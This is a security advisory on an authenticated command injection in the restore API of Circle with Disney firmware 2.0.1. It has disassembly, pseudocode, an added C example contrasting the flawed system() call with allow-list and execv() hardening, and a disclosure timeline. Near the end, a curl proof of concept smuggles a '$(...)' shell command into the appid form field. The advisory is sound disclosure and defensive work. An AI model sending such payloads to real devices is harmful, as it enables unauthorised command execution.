Talos Intelligence (www.talosintelligence.com) - TALOS-2017-0397
Oct 31, 2017 - 12:00 a.m.

Circle with Disney Restore API Command Injection Vulnerability

CVSS2: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

CVSS3: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

EPSS: 0.002
Percentile: 53.0%

Summary

An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

https://meetcircle.com/

CVSSv3 Score

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-77: Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

Details

The vulnerable code exists in the restore API handler of the “apid” daemon (“/api/CONFIG/restore”), function sub_417528:

.text:004176A4 loc_4176A4:
.text:004176A4                 lw      $v0, (dword_44CB3C - 0x450000)($v0)
.text:004176A8                 nop
.text:004176AC                 beqz    $v0, loc_4177A8
.text:004176B0                 li      $v0, 1
.text:004176B4                 beq     $s4, $v0, loc_417860
.text:004176B8                 lui     $a0, 0x43
.text:004176BC                 jal     strlen
.text:004176C0                 addiu   $a0, $s6, (byte_44CC40 - 0x450000)
.text:004176C4                 sltiu   $v0, 0x14
.text:004176C8                 bnez    $v0, loc_4177A8
.text:004176CC                 lui     $v0, 0x45
.text:004176D0                 la      $v0, byte_44CC40                 # appid
.text:004176D4                 sw      $v0, 0x200+var_1F0($sp)
.text:004176D8                 lui     $a2, 0x43
.text:004176DC                 li      $v0, 0x42
.text:004176E0                 lui     $a3, 0x43
.text:004176E4                 addiu   $a0, $sp, 0x200+var_148
.text:004176E8                 li      $a1, 0x80
.text:004176EC                 la      $a2, aSrestore_backu             # "%srestore_backup.sh /tmp/postfile.bin %s %d"
.text:004176F0                 la      $a3, aMntSharesUs_19             # "/mnt/shares/usr/bin/scripts/"
.text:004176F4                 jal     snprintf
.text:004176F8                 sw      $v0, 0x200+var_1EC($sp)
.text:004176FC                 jal     system
.text:00417700                 addiu   $a0, $sp, 0x200+var_148

Looking at the pseudocode of the whole function, we see the following:

if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0)
    if (stat("/mnt/shares/usr/bin/app_list") == 0)
        if (auth_token[0] != 0 && check_token(auth_token))
            // sltiu $v0, 0x14 / bnez: the handler bails out only when the appid is
            // shorter than 20 bytes, so any appid of 20 bytes or more reaches system()
            if (strlen(appid) >= 20) {
                // appid is interpolated unescaped into a /bin/sh command line
                snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d", "/mnt/shares/usr/bin/scripts/", appid, 66);
                system(cmd);
            }

As we can see, the appid parameter, which comes from the user as a multipart form parameter, is passed directly to the system() call without any sanitization, which leads to command injection. This API is accessible to authenticated users.
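The following is an added example, not code from Talos or from the Circle firmware, that puts the advisory's vulnerable pattern beside a hardened form. build_restore_cmd_unsafe() reproduces the snprintf()-into-system() construction from the pseudocode above so the problem is visible; is_safe_appid() and run_restore_safe() show the two fixes a reviewer would ask for: an allow-list check on the parameter, and execv() with a separate argv so no shell ever parses the value. The minimum length of 20, the script path and the trailing argument 66 are taken from the page; the function names, the character allow-list and the 64-byte upper bound are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define APPID_MIN 20   /* the daemon's own minimum, per the advisory */
#define APPID_MAX 64   /* assumed upper bound for the example */
#define SCRIPTS_DIR "/mnt/shares/usr/bin/scripts/"

/* Vulnerable pattern, mirroring the advisory's pseudocode: the user-supplied
 * appid is pasted into a shell command line.  Anything a shell interprets,
 * such as "$(...)", ";" or "|", would run if this string were handed to
 * system().  The function only builds the string so the effect can be seen. */
int build_restore_cmd_unsafe(char *cmd, size_t cmdlen, const char *appid)
{
    return snprintf(cmd, cmdlen,
                    "%srestore_backup.sh /tmp/postfile.bin %s %d",
                    SCRIPTS_DIR, appid, 66);
}

/* Hardened input check: bounded length and an allow-list of characters
 * (alphanumerics plus '_', '-' and '.').  Rejecting everything else removes
 * every shell metacharacter, and it is also the right place to reject an
 * appid that could be used as a path component ("../"). */
int is_safe_appid(const char *appid)
{
    size_t n = strlen(appid);
    if (n < APPID_MIN || n > APPID_MAX)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)appid[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Hardened execution: no shell at all.  The script and its arguments are
 * passed as a separate argv to execv(), so appid arrives in the script as a
 * single argument whatever it contains.  Returns the child's exit status,
 * or -1 if validation fails or the child could not be spawned/waited for. */
int run_restore_safe(const char *appid)
{
    if (!is_safe_appid(appid))
        return -1;

    char arg_last[16];
    snprintf(arg_last, sizeof arg_last, "%d", 66);

    char *const argv[] = {
        SCRIPTS_DIR "restore_backup.sh",
        "/tmp/postfile.bin",
        (char *)appid,
        arg_last,
        NULL
    };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);             /* exec failed: script missing or not executable */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Both layers matter: the allow-list alone still leaves a shell in the path if someone later relaxes it, and execv() alone still lets a hostile value reach restore_backup.sh as an argument, so the script would need to be audited for how it uses that argument. Applying both keeps the daemon's behaviour (a script invoked with three arguments) while removing the injection.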

Exploit Proof-of-Concept

The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs to use a valid token in order to trigger the vulnerability.

$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")');
$ touch empty
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"

Timeline

2017-08-29 - Vendor Disclosure
2017-10-31 - Public Release
